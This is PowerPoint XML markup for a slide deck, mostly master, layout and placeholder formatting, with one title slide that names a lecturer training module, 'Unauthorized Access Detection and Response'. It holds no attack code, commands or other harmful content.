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notesMasterIdLst>
    <p:notesMasterId r:id="rId26"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId27"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="389" r:id="rId2"/>
    <p:sldId id="447" r:id="rId3"/>
    <p:sldId id="448" r:id="rId4"/>
    <p:sldId id="449" r:id="rId5"/>
    <p:sldId id="450" r:id="rId6"/>
    <p:sldId id="446" r:id="rId7"/>
    <p:sldId id="452" r:id="rId8"/>
    <p:sldId id="454" r:id="rId9"/>
    <p:sldId id="473" r:id="rId10"/>
    <p:sldId id="476" r:id="rId11"/>
    <p:sldId id="480" r:id="rId12"/>
    <p:sldId id="474" r:id="rId13"/>
    <p:sldId id="489" r:id="rId14"/>
    <p:sldId id="490" r:id="rId15"/>
    <p:sldId id="491" r:id="rId16"/>
    <p:sldId id="492" r:id="rId17"/>
    <p:sldId id="493" r:id="rId18"/>
    <p:sldId id="482" r:id="rId19"/>
    <p:sldId id="483" r:id="rId20"/>
    <p:sldId id="453" r:id="rId21"/>
    <p:sldId id="484" r:id="rId22"/>
    <p:sldId id="488" r:id="rId23"/>
    <p:sldId id="487" r:id="rId24"/>
    <p:sldId id="441" r:id="rId25"/>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EF6A67"/>
    <a:srgbClr val="B01513"/>
    <a:srgbClr val="D9BED7"/>
    <a:srgbClr val="FBE0CF"/>
    <a:srgbClr val="F49896"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="7F7F7F"/>
    <a:srgbClr val="3269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488" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="107" d="100"/>
          <a:sy n="107" d="100"/>
        </p:scale>
        <p:origin x="714"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4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0637195-2B2D-46A0-8EF1-9A1439DAA414}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2944703" cy="496491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91700" tIns="45850" rIns="91700" bIns="45850" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E46543C-9A60-422F-BD01-FE87A11CFAC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3851379" y="0"/>
            <a:ext cx="2944703" cy="496491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91700" tIns="45850" rIns="91700" bIns="45850" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5E5C4DD-E5A9-42F1-A68C-656A8FA85B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9428557"/>
            <a:ext cx="2944703" cy="496491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91700" tIns="45850" rIns="91700" bIns="45850" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36869" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7E1552D-0843-49AD-A1D1-7647C83BDB77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3851379" y="9428557"/>
            <a:ext cx="2944703" cy="496491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91700" tIns="45850" rIns="91700" bIns="45850" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{16656C8D-6A0E-4CD8-AAD2-90F7F809DBEC}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1423577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7D49E0C-3EE2-4C68-ACF7-36B6CC4C2C43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2944703" cy="496491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91700" tIns="45850" rIns="91700" bIns="45850" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42221381-878E-4E70-9CF5-AA123C7E678C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3851379" y="0"/>
            <a:ext cx="2944703" cy="496491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91700" tIns="45850" rIns="91700" bIns="45850" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33796" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19DFCAE3-89EC-4FD7-B2A9-EE1F8BA7C55A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFFD7BF1-54EC-433D-966C-5CA4E4BED3D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="678812" y="4715074"/>
            <a:ext cx="5440052" cy="4466827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91700" tIns="45850" rIns="91700" bIns="4585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1510" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7765C366-DEEF-45DE-91F2-0E571D57A6BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9428557"/>
            <a:ext cx="2944703" cy="496491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91700" tIns="45850" rIns="91700" bIns="45850" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21511" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09EE882C-EBE0-4193-A3D8-5D2B13C3CBE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3851379" y="9428557"/>
            <a:ext cx="2944703" cy="496491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91700" tIns="45850" rIns="91700" bIns="45850" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{EAEA45AC-B334-4D8A-A89F-A40DB1534658}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1989677418"/>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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2736079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11</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12</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AEA45AC-B334-4D8A-A89F-A40DB1534658}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2630197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17</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18</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19</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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="621312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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="621312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22</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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356536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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317617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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47682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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4001730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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3953303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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334289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8</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9</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AEA45AC-B334-4D8A-A89F-A40DB1534658}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393001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ko-KR" altLang="en-US"/>
              <a:t>마스터 제목 스타일 편집</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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-K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2015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AAD347D-5ACD-4C99-B74B-A9C85AD731AF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/19/2021</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278463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ko-KR" altLang="en-US"/>
              <a:t>마스터 제목 스타일 편집</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AAD347D-5ACD-4C99-B74B-A9C85AD731AF}"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7355055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ko-KR" altLang="en-US"/>
              <a:t>마스터 제목 스타일 편집</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ko-KR" altLang="en-US"/>
              <a:t>마스터 텍스트 스타일을 편집하려면 클릭</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AAD347D-5ACD-4C99-B74B-A9C85AD731AF}"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008038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AAD347D-5ACD-4C99-B74B-A9C85AD731AF}"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81532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ko-KR" altLang="en-US"/>
              <a:t>마스터 제목 스타일 편집</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12/19/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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8052083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그림 열 3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ko-KR" altLang="en-US"/>
              <a:t>마스터 제목 스타일 편집</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12/19/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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8149540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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-K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29131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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-K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4532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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="내용 개체 틀 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B73A61-F31A-4046-A092-6CB4C5BE08D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10920413" y="836613"/>
            <a:ext cx="914400" cy="91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31161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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-K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119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12/19/2021</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7467017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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>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8206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7" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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032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ltLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1414AEF-6446-4A85-A790-9865417DCF04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="131060" y="44624"/>
            <a:ext cx="10369152" cy="1872208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CCYBER AEGIS for HUST Lecturers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#80. Unauthorized Access Detection and Response</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102979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7" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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586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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-K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6967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12/19/2021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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="직선 연결선 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{518030B2-C72B-4592-85CC-EE0A6D4DFB6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5257800"/>
            <a:ext cx="12192000" cy="49795"/>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63785390"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt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 id="2147484083" r:id="rId12"/>
    <p:sldLayoutId id="2147484084" r:id="rId13"/>
    <p:sldLayoutId id="2147484085" r:id="rId14"/>
    <p:sldLayoutId id="2147484086" r:id="rId15"/>
